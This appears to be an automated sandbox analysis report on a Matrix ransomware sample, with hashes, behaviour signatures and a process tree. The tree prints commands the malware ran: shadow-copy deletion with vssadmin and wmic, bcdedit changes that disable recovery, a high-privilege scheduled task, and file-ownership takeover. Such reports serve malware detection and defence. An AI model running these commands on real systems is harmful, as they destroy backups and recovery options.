Overview

overview

10

Static

static

72c5665c43...f5.exe

windows7_x64

10

72c5665c43...f5.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    06-03-2022 04:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe

  • Size

    2.6MB

  • MD5

    1f987de3da76b532d5eb4dc0a8e07edc

  • SHA1

    2002718bb7d81d6661892c6f2631df27eac89f61

  • SHA256

    72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5

  • SHA512

    7db16f026aee59ff24e30e7e4ce9a0c7a0d6575b5dc1e7907169fd0fe53a5576deb21e16e7a88d053fe6ea6cec035458539e180e4caac6b46f5e612ce4486310

Score
10/10
matrixdiscoveryevasionpersistenceransomwaresuricataupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

    suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

    suricata
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Sets service image path in registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
    "C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe"
    1⤵
    • Matrix Ransomware
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe" "C:\Users\Admin\AppData\Local\Temp\NWPXunQj.exe"
      2⤵
        PID:3600
      • C:\Users\Admin\AppData\Local\Temp\NWPXunQj.exe
        "C:\Users\Admin\AppData\Local\Temp\NWPXunQj.exe" -n
        2⤵
        • Executes dropped EXE
        PID:3968
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\7nSNW2hR.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5080
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5076
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Ihgf3hzt.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\SysWOW64\wscript.exe
          wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Ihgf3hzt.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uveJssXh.bat" /sc minute /mo 5 /RL HIGHEST /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3676
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uveJssXh.bat" /sc minute /mo 5 /RL HIGHEST /F
              5⤵
              • Creates scheduled task(s)
              PID:1100
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4348
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /I /tn DSHCA
              5⤵
                PID:4436
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\l9RsEB57.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4832
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\l9RsEB57.bmp" /f
            3⤵
            • Sets desktop wallpaper using registry
            PID:5028
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
            3⤵
              PID:2516
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
              3⤵
                PID:4080
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mZSyH3cn.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4420
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
                3⤵
                • Views/modifies file attributes
                PID:504
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
                3⤵
                  PID:3784
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"
                  3⤵
                  • Modifies file permissions
                  PID:3600
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c IVxonbPa.exe -accepteula "qmgr.db" -nobanner
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3132
                  • C:\Users\Admin\AppData\Local\Temp\IVxonbPa.exe
                    IVxonbPa.exe -accepteula "qmgr.db" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3772
                    • C:\Users\Admin\AppData\Local\Temp\IVxonbPa64.exe
                      IVxonbPa.exe -accepteula "qmgr.db" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3648
            • C:\Windows\SYSTEM32\cmd.exe
              C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\uveJssXh.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:2312
              • C:\Windows\system32\vssadmin.exe
                vssadmin Delete Shadows /All /Quiet
                2⤵
                • Interacts with shadow copies
                PID:4852
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic SHADOWCOPY DELETE
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2096
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3596
                • C:\Windows\system32\vssadmin.exe
                  "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                  3⤵
                  • Interacts with shadow copies
                  PID:4012
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:504
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:3784
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Delete /TN DSHCA /F
                2⤵
                  PID:3600
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:208

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                MD5

                4ddbc3b3c6279b9f44b5cebdfe105999

                SHA1

                c7e5d318cd000059ce591dc5f499ae102a4bf88c

                SHA256

                becefc55430eef99d6427cf28a82fd23e220d9fb8b041a0227d7518481454e91

                SHA512

                80887bf6f263d80d47e2640d3883c3a50f2ebb6bcfd8a0cc6fca402f52e9690776c9d886cb11284716f492e57c6a9166ccfaa12a021d79d97da702023ef0cbd9

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\7nSNW2hR.txt
                MD5

                75564e2df4b8c8d33695e8e5e58cb03c

                SHA1

                64a796a9f01a1f12bcbe641ecc92541a41ece9b5

                SHA256

                bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965

                SHA512

                c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IVxonbPa.exe
                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IVxonbPa.exe
                MD5

                2f5b509929165fc13ceab9393c3b911d

                SHA1

                b016316132a6a277c5d8a4d7f3d6e2c769984052

                SHA256

                0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                SHA512

                c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IVxonbPa64.exe
                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IVxonbPa64.exe
                MD5

                3026bc2448763d5a9862d864b97288ff

                SHA1

                7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                SHA256

                7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                SHA512

                d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\NWPXunQj.exe
                MD5

                1f987de3da76b532d5eb4dc0a8e07edc

                SHA1

                2002718bb7d81d6661892c6f2631df27eac89f61

                SHA256

                72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5

                SHA512

                7db16f026aee59ff24e30e7e4ce9a0c7a0d6575b5dc1e7907169fd0fe53a5576deb21e16e7a88d053fe6ea6cec035458539e180e4caac6b46f5e612ce4486310

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\NWPXunQj.exe
                MD5

                1f987de3da76b532d5eb4dc0a8e07edc

                SHA1

                2002718bb7d81d6661892c6f2631df27eac89f61

                SHA256

                72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5

                SHA512

                7db16f026aee59ff24e30e7e4ce9a0c7a0d6575b5dc1e7907169fd0fe53a5576deb21e16e7a88d053fe6ea6cec035458539e180e4caac6b46f5e612ce4486310

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\mZSyH3cn.bat
                MD5

                851e25639da60d9e945c8149c5189e66

                SHA1

                8554d2db6defa77a4b89f66817f7d81d0e9d4a04

                SHA256

                3f9811a5e3cabbf99d6bb0f0379e8a2a33f4ddf2a4eb265807e13c015808babd

                SHA512

                dbe41afcbafb842adc983aa3abd2f705bf32f7c3f17dd5d10db0b63629a5cefe251375f5248771c9dd324a9b1e927139bde65f98d3ff84a531191a993424fa33

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Ihgf3hzt.vbs
                MD5

                db5f569deb3efafa8c39d43ed00264a5

                SHA1

                64bba1429b401662e9a7e67176f2cf93a4b8f724

                SHA256

                98713715f4bcd368a98c60cdb2e8f571270fc45891b593c8894975d680c8436a

                SHA512

                0dbd03c8edc4c2bbbe62f23ff7778c404912b7476b3f86066afac8b5e7f238e6512b3aa53ac2344c6723d66e6242f34c26b05cf4986c58fa8647e49ad3ebd8d4

                Download Submit

              • C:\Users\Admin\AppData\Roaming\uveJssXh.bat
                MD5

                ddeadf2b053d28e7b8c9a786637b14f5

                SHA1

                9b921a45737b9ae5c28509bd21855933ee0e464b

                SHA256

                1befb379fd1a2111590fe4a0cf433526a9eb5aea11aaf51c46db2d146288244c

                SHA512

                367b68f9975c8107da83291af9ee47522779689d8c16eb907fcad49ce8bf6514f19f7fdce11dcd14ccda096893115005bb0a2da572c37f7dcf795cd94c877902

                Download Submit

              • memory/3596-153-0x000002BE8D110000-0x000002BE8D112000-memory.dmp

                Filesize

                8KB

                Download

              • memory/3596-157-0x000002BE8D116000-0x000002BE8D118000-memory.dmp

                Filesize

                8KB

                Download

              • memory/3596-155-0x000002BE8FBE0000-0x000002BE8FC02000-memory.dmp

                Filesize

                136KB

                Download

              • memory/3596-154-0x000002BE8D113000-0x000002BE8D115000-memory.dmp

                Filesize

                8KB

                Download

              • memory/3596-152-0x000002BE8EE40000-0x000002BE8F901000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/5076-139-0x0000000005BD0000-0x0000000005C36000-memory.dmp

                Filesize

                408KB

                Download

              • memory/5076-137-0x0000000005950000-0x0000000005972000-memory.dmp

                Filesize

                136KB

                Download

              • memory/5076-136-0x0000000005290000-0x00000000058B8000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/5076-135-0x0000000004C12000-0x0000000004C13000-memory.dmp

                Filesize

                4KB

                Download

              • memory/5076-133-0x0000000073CD0000-0x0000000074480000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/5076-134-0x0000000004C10000-0x0000000004C11000-memory.dmp

                Filesize

                4KB

                Download

              • memory/5076-138-0x0000000005AF0000-0x0000000005B56000-memory.dmp

                Filesize

                408KB

                Download

              • memory/5076-141-0x0000000004C15000-0x0000000004C17000-memory.dmp

                Filesize

                8KB

                Download

              • memory/5076-140-0x0000000006260000-0x000000000627E000-memory.dmp

                Filesize

                120KB

                Download

              • memory/5076-143-0x0000000006760000-0x000000000677A000-memory.dmp

                Filesize

                104KB

                Download

              • memory/5076-132-0x0000000004C20000-0x0000000004C56000-memory.dmp

                Filesize

                216KB

                Download

              • memory/5076-142-0x0000000007AA0000-0x000000000811A000-memory.dmp

                Filesize

                6.5MB

                Download